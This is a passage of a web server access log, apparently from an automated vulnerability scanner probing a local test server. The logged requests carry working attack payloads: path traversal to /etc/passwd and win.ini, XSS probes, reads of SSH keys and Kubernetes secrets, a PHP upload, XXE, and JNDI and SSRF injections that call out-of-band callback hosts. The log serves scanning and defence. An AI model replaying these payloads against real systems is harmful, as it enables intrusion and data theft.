"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTo6tf1qkoRtnNK4RzCWabnq/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTo6tf1qkoRtnNK4RzCWabnq/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x22297MU5Oy4bsw7lCEzrPDK3YFZZG.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://c9v8hn0smpv8c57g0t00o6r3wuh3k7q83.oast.live%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://c9v8hs0smpv8c6ag07h0tm5b5d4roz514.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) 